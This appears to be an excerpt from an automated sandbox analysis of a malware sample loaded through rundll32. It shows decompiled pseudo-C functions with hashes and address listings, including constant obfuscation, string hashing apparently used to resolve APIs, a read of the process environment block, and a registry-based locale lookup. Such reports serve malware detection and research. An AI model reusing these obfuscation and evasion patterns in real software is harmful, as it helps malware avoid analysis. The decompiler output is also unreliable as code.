                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                                    • Instruction ID: 83b385754b8ba509f5c55f8a76ac9bda2ccd012d33c7d5f530e46eda786101e0
                                                                                                                                    • Opcode Fuzzy Hash: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                                    • Instruction Fuzzy Hash: 183147725083028BC314CF25D58540BFBE1BBD8798F108A1DF599A7221D3B5DA59CB97
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C8969 Relevance: .1, Instructions: 84COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002C8969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t84;
				signed int _t99;
				signed int _t103;
				void* _t109;
				signed int _t110;

				_push(_a8);
				_t109 = __edx;
				_push(_a4);
				_push(__edx);
				E002D20B9(_t84);
				_v40 = _v40 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v44 = 0x779abe;
				_v20 = 0xb5573d;
				_v20 = _v20 ^ 0xbb0d078e;
				_t103 = 0x58;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x328c396d;
				_v16 = 0x362481;
				_v16 = _v16 + 0x16cb;
				_v16 = _v16 | 0xfe676eb4;
				_v16 = _v16 ^ 0xfe76a30b;
				_v32 = 0xc91798;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x4f59c84a;
				_v28 = 0xb97254;
				_v28 = _v28 / _t103;
				_v28 = _v28 ^ 0x000673a7;
				_v12 = 0xb6c56;
				_v12 = _v12 * 0x2a;
				_v12 = _v12 << 1;
				_v12 = _v12 * 0x5b;
				_v12 = _v12 ^ 0x5515a6e4;
				_v8 = 0x1f2e02;
				_v8 = _v8 * 0x66;
				_v8 = _v8 * 0x79;
				_v8 = _v8 + 0xffff535b;
				_v8 = _v8 ^ 0xdf3e36a5;
				_v24 = 0x692813;
				_v24 = _v24 >> 0xb;
				_v24 = _v24 + 0xffffcb9d;
				_v24 = _v24 ^ 0xfffb0f76;
				E002DD25E(_t103);
				_v16 = 0x87422f;
				_v16 = _v16 | 0xfc58150b;
				_v16 = _v16 ^ 0xfcdf572b;
				_v20 = 0xc6266d;
				_v20 = _v20 << 0xa;
				_v20 = _v20 + 0xffff7638;
				_v20 = _v20 ^ 0x18992a28;
				_t99 = E002D0AE0(_v20, _v16);
				_push(_v24);
				_t110 = _t99;
				_push(_t109);
				_push(_t110);
				_push(1);
				E002C80E3(_v12, _v8);
				 *((short*)(_t109 + _t110 * 2)) = 0;
				return 0;
			}


















                                                                                                                                    0x002c8971
                                                                                                                                    0x002c8974
                                                                                                                                    0x002c8976
                                                                                                                                    0x002c8979
                                                                                                                                    0x002c897b
                                                                                                                                    0x002c8980
                                                                                                                                    0x002c8986
                                                                                                                                    0x002c898a
                                                                                                                                    0x002c8991
                                                                                                                                    0x002c8998
                                                                                                                                    0x002c89a5
                                                                                                                                    0x002c89a6
                                                                                                                                    0x002c89a9
                                                                                                                                    0x002c89b0
                                                                                                                                    0x002c89b7
                                                                                                                                    0x002c89be
                                                                                                                                    0x002c89c5
                                                                                                                                    0x002c89cc
                                                                                                                                    0x002c89d7
                                                                                                                                    0x002c89da
                                                                                                                                    0x002c89e1
                                                                                                                                    0x002c89ed
                                                                                                                                    0x002c89f0
                                                                                                                                    0x002c89f7
                                                                                                                                    0x002c8a02
                                                                                                                                    0x002c8a05
                                                                                                                                    0x002c8a0c
                                                                                                                                    0x002c8a0f
                                                                                                                                    0x002c8a16
                                                                                                                                    0x002c8a21
                                                                                                                                    0x002c8a28
                                                                                                                                    0x002c8a2b
                                                                                                                                    0x002c8a32
                                                                                                                                    0x002c8a39
                                                                                                                                    0x002c8a40
                                                                                                                                    0x002c8a44
                                                                                                                                    0x002c8a4b
                                                                                                                                    0x002c8a58
                                                                                                                                    0x002c8a5d
                                                                                                                                    0x002c8a64
                                                                                                                                    0x002c8a6b
                                                                                                                                    0x002c8a72
                                                                                                                                    0x002c8a79
                                                                                                                                    0x002c8a7d
                                                                                                                                    0x002c8a84
                                                                                                                                    0x002c8a97
                                                                                                                                    0x002c8a9c
                                                                                                                                    0x002c8aa2
                                                                                                                                    0x002c8aa7
                                                                                                                                    0x002c8aa8
                                                                                                                                    0x002c8aa9
                                                                                                                                    0x002c8aab
                                                                                                                                    0x002c8ab5
                                                                                                                                    0x002c8abe

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                                    • Instruction ID: 89f4d669621dca268c4a58f67db26edc8b777426a49b10e226efcba83ddb0e8b
                                                                                                                                    • Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                                    • Instruction Fuzzy Hash: 4941DD71C1121AEBCF18CFE5C98A9EEBFB0FB44314F108189D525AA260D3B95B55CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DDBEA Relevance: .1, Instructions: 76COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E002DDBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t74;
				char* _t82;
				signed int _t84;

				_push(_a12);
				_t82 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002D20B9(_t74);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x71ca23;
				_v24 = 0x57f692;
				_v12 = 0xd3252c;
				_v12 = _v12 + 0x4351;
				_v12 = _v12 + 0xffff5b79;
				_v12 = _v12 ^ 0x00d2c3f6;
				_v8 = 0xbb067e;
				_t84 = 0x11;
				_v8 = _v8 / _t84;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xac5d3832;
				_v8 = _v8 ^ 0xac5d3334;
				_v8 = 0xab60c2;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x910d5570;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0f1cf547;
				if( *__edx != 0) {
					do {
						_v8 = 0xbb067e;
						_v8 = _v8 / _t84;
						_v8 = _v8 >> 8;
						_v8 = _v8 ^ 0xac5d3832;
						_v8 = _v8 ^ 0xac5d3334;
						_v8 = 0xab60c2;
						_v8 = _v8 << 0x10;
						_v8 = _v8 ^ 0x910d5570;
						_v8 = _v8 >> 4;
						_v8 = _v8 ^ 0x0f1cf547;
						_v12 =  *_t82;
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 - _v12;
						_t82 = _t82 + 1;
						_t84 = 0x11;
					} while ( *_t82 != 0);
				}
				return _v12;
			}












                                                                                                                                    0x002ddbf1
                                                                                                                                    0x002ddbf4
                                                                                                                                    0x002ddbf6
                                                                                                                                    0x002ddbf9
                                                                                                                                    0x002ddbfc
                                                                                                                                    0x002ddbfe
                                                                                                                                    0x002ddc03
                                                                                                                                    0x002ddc0a
                                                                                                                                    0x002ddc10
                                                                                                                                    0x002ddc17
                                                                                                                                    0x002ddc1e
                                                                                                                                    0x002ddc25
                                                                                                                                    0x002ddc2c
                                                                                                                                    0x002ddc33
                                                                                                                                    0x002ddc3a
                                                                                                                                    0x002ddc46
                                                                                                                                    0x002ddc49
                                                                                                                                    0x002ddc4c
                                                                                                                                    0x002ddc50
                                                                                                                                    0x002ddc57
                                                                                                                                    0x002ddc5e
                                                                                                                                    0x002ddc65
                                                                                                                                    0x002ddc69
                                                                                                                                    0x002ddc70
                                                                                                                                    0x002ddc74
                                                                                                                                    0x002ddc7e
                                                                                                                                    0x002ddc82
                                                                                                                                    0x002ddc87
                                                                                                                                    0x002ddc95
                                                                                                                                    0x002ddc98
                                                                                                                                    0x002ddc9c
                                                                                                                                    0x002ddca3
                                                                                                                                    0x002ddcb0
                                                                                                                                    0x002ddcb7
                                                                                                                                    0x002ddcbb
                                                                                                                                    0x002ddcc2
                                                                                                                                    0x002ddcc6
                                                                                                                                    0x002ddcd8
                                                                                                                                    0x002ddcdb
                                                                                                                                    0x002ddce0
                                                                                                                                    0x002ddce3
                                                                                                                                    0x002ddce6
                                                                                                                                    0x002ddce7
                                                                                                                                    0x002ddce8
                                                                                                                                    0x002ddcee
                                                                                                                                    0x002ddcf6

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                                    • Instruction ID: 8e1bdf85c11b826a840483d37e7fdc64acf280a66e405389517163baf6cb3c7c
                                                                                                                                    • Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                                    • Instruction Fuzzy Hash: 96311FB1D12348EBDF06DFA8CA4A2DEBBB0EF44314F208099D501A7265D3B14B98EF40
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C9011 Relevance: .1, Instructions: 67COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E002C9011(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _t75;
				intOrPtr _t80;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v44 = 0xa2b624;
				_v8 = 0x99eb9;
				_t88 = __edx;
				_v8 = _v8 * 0x25;
				_v8 = _v8 | 0x30e9a4b5;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x3d7f3aa0;
				_v24 = 0x77b72d;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x00e56894;
				_v20 = 0x2ce6cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x000f2bb3;
				_v32 = 0xab4cd;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x0007aa85;
				_v28 = 0x1f3eea;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x0004326d;
				_v12 = 0xc1e4f9;
				_v12 = _v12 ^ 0x329f08e7;
				_v12 = _v12 + 0xcc91;
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0038f912;
				_v16 = 0x3b10d4;
				_t89 = 0x6f;
				_v16 = _v16 / _t89;
				_v16 = _v16 + 0xffff4357;
				_v16 = _v16 ^ 0xf8ba2c27;
				_v16 = _v16 ^ 0x074e6031;
				_v36 = 0x1364c3;
				_v36 = _v36 + 0x503c;
				_v36 = _v36 ^ 0x001cba9a;
				_push(_v20);
				_push(_v24);
				_t75 = E002D5BFD(_v32, _v28, _v12, E002DDCF7(_v8, __ecx, _v36));
				_t80 =  *0x2e3df8; // 0x0
				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
				return E002CA8B0(_v16, _t74, _v36);
			}

















                                                                                                                                    0x002c9017
                                                                                                                                    0x002c901b
                                                                                                                                    0x002c9022
                                                                                                                                    0x002c902f
                                                                                                                                    0x002c9035
                                                                                                                                    0x002c9038
                                                                                                                                    0x002c903f
                                                                                                                                    0x002c9043
                                                                                                                                    0x002c904a
                                                                                                                                    0x002c9051
                                                                                                                                    0x002c9054
                                                                                                                                    0x002c905b
                                                                                                                                    0x002c9062
                                                                                                                                    0x002c9066
                                                                                                                                    0x002c906d
                                                                                                                                    0x002c9074
                                                                                                                                    0x002c9078
                                                                                                                                    0x002c907f
                                                                                                                                    0x002c9086
                                                                                                                                    0x002c908a
                                                                                                                                    0x002c9091
                                                                                                                                    0x002c9098
                                                                                                                                    0x002c909f
                                                                                                                                    0x002c90a6
                                                                                                                                    0x002c90aa
                                                                                                                                    0x002c90b1
                                                                                                                                    0x002c90bb
                                                                                                                                    0x002c90c0
                                                                                                                                    0x002c90c3
                                                                                                                                    0x002c90ca
                                                                                                                                    0x002c90d1
                                                                                                                                    0x002c90d8
                                                                                                                                    0x002c90df
                                                                                                                                    0x002c90e6
                                                                                                                                    0x002c90ed
                                                                                                                                    0x002c90f0
                                                                                                                                    0x002c9107
                                                                                                                                    0x002c910c
                                                                                                                                    0x002c9117
                                                                                                                                    0x002c912b

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 57a81acb90cffb89b17f3099a0a3527f3f865039e4a819be3adb5c561134a28e
                                                                                                                                    • Instruction ID: 9460b7f419bce60344db4502ebf4e31e66148bd37701303b874a068503a87f6c
                                                                                                                                    • Opcode Fuzzy Hash: 57a81acb90cffb89b17f3099a0a3527f3f865039e4a819be3adb5c561134a28e
                                                                                                                                    • Instruction Fuzzy Hash: 4431F071D0121EEBCF48EFA5D94A4EEBBB1FF44318F208199D421B6250D7B90A59DF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C7FF2 Relevance: .1, Instructions: 54COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E002C7FF2(void* __edx) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t67;
				void* _t73;

				_v32 = _v32 & 0x00000000;
				_v40 = 0xdad9ef;
				_v36 = 0x9bb390;
				_v28 = 0x653306;
				_v28 = _v28 + 0xffff1628;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x000c892d;
				_v12 = 0x5dd1e8;
				_v12 = _v12 ^ 0xb170c383;
				_v12 = _v12 | 0x2785cc64;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x05b45dea;
				_v8 = 0x56f6d9;
				_v8 = _v8 + 0xc121;
				_t73 = __edx;
				_t67 = 0x41;
				_v8 = _v8 / _t67;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x00a76089;
				_v24 = 0xf5edfd;
				_v24 = _v24 | 0x2f446a90;
				_v24 = _v24 ^ 0x7c479bdf;
				_v24 = _v24 ^ 0x53b1dfb9;
				_v20 = 0xafa903;
				_v20 = _v20 + 0xffff9fdf;
				_v20 = _v20 ^ 0xafba618c;
				_v20 = _v20 ^ 0xaf136809;
				_v16 = 0x74f1b4;
				_v16 = _v16 >> 7;
				_v16 = _v16 | 0x7bde77db;
				_v16 = _v16 ^ 0x7bddce28;
				return E002C1E22(_v28, _v24, _t73, E002C1DB9(_t67), _v20, _v16);
			}














                                                                                                                                    0x002c7ff8
                                                                                                                                    0x002c7ffc
                                                                                                                                    0x002c8003
                                                                                                                                    0x002c800a
                                                                                                                                    0x002c8011
                                                                                                                                    0x002c8018
                                                                                                                                    0x002c801c
                                                                                                                                    0x002c8023
                                                                                                                                    0x002c802a
                                                                                                                                    0x002c8031
                                                                                                                                    0x002c8038
                                                                                                                                    0x002c803c
                                                                                                                                    0x002c8043
                                                                                                                                    0x002c804a
                                                                                                                                    0x002c8055
                                                                                                                                    0x002c805b
                                                                                                                                    0x002c805e
                                                                                                                                    0x002c8061
                                                                                                                                    0x002c8065
                                                                                                                                    0x002c806c
                                                                                                                                    0x002c8073
                                                                                                                                    0x002c807a
                                                                                                                                    0x002c8081
                                                                                                                                    0x002c8088
                                                                                                                                    0x002c808f
                                                                                                                                    0x002c8096
                                                                                                                                    0x002c809d
                                                                                                                                    0x002c80a4
                                                                                                                                    0x002c80ab
                                                                                                                                    0x002c80af
                                                                                                                                    0x002c80b6
                                                                                                                                    0x002c80e2

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                                    • Instruction ID: 06452b56f0a775ddce52bf7e4a86fd3e080cc0dfad0f6a874b4cc6a17bfef306
                                                                                                                                    • Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                                    • Instruction Fuzzy Hash: 2921EFB2C0131EEBCB48DFE5D94A5EEFBB0BB11314F208189D512B2264C3B40B598F91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D4087 Relevance: .0, Instructions: 2COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E002D4087() {

				return  *[fs:0x30];
			}



                                                                                                                                    0x002d408d

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10014DA8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                    			E10014DA8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x100545cc; // 0x67083a02
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E10030D27(E10043F3E, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E10014522, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E100312A0( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10030030(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E10014538(_t181 - 0x3c, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E100145E8(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E1001461E(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E10014C3E(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10014B71( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1002F81E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}
































                                                                                                                                    0x10014da8
                                                                                                                                    0x10014da9
                                                                                                                                    0x10014daf
                                                                                                                                    0x10014db3
                                                                                                                                    0x10014dba
                                                                                                                                    0x10014dc0
                                                                                                                                    0x10014dc7
                                                                                                                                    0x10014dd8
                                                                                                                                    0x10014ddf
                                                                                                                                    0x10014de2
                                                                                                                                    0x10014de5
                                                                                                                                    0x10014de8
                                                                                                                                    0x10014df6
                                                                                                                                    0x10014df9
                                                                                                                                    0x10014dfd
                                                                                                                                    0x10014ecb
                                                                                                                                    0x10014f87
                                                                                                                                    0x10014f8b
                                                                                                                                    0x10014f9f
                                                                                                                                    0x10014fa2
                                                                                                                                    0x10014fac
                                                                                                                                    0x10014fb2
                                                                                                                                    0x10014fca
                                                                                                                                    0x10014fd6
                                                                                                                                    0x10014fdb
                                                                                                                                    0x10014fde
                                                                                                                                    0x10014fde
                                                                                                                                    0x10014fac
                                                                                                                                    0x10014ed1
                                                                                                                                    0x10014ee5
                                                                                                                                    0x10014ef0
                                                                                                                                    0x10014f06
                                                                                                                                    0x10014f15
                                                                                                                                    0x10014f2d
                                                                                                                                    0x10014f32
                                                                                                                                    0x10014f38
                                                                                                                                    0x10014f44
                                                                                                                                    0x10014f47
                                                                                                                                    0x10014f59
                                                                                                                                    0x10014f65
                                                                                                                                    0x10014f6a
                                                                                                                                    0x10014f6d
                                                                                                                                    0x10014f6d
                                                                                                                                    0x10014f38
                                                                                                                                    0x10014f77
                                                                                                                                    0x10014f77
                                                                                                                                    0x10014ef0
                                                                                                                                    0x10014e03
                                                                                                                                    0x10014e0b
                                                                                                                                    0x10014e0e
                                                                                                                                    0x10014e11
                                                                                                                                    0x10014e23
                                                                                                                                    0x10014e2c
                                                                                                                                    0x10014e34
                                                                                                                                    0x10014e41
                                                                                                                                    0x10014e44
                                                                                                                                    0x10014e4b
                                                                                                                                    0x10014e4f
                                                                                                                                    0x10014e53
                                                                                                                                    0x10014e56
                                                                                                                                    0x10014e59
                                                                                                                                    0x10014e66
                                                                                                                                    0x10014e72
                                                                                                                                    0x10014e77
                                                                                                                                    0x10014e7a
                                                                                                                                    0x10014e7a
                                                                                                                                    0x10014e81
                                                                                                                                    0x10014e81
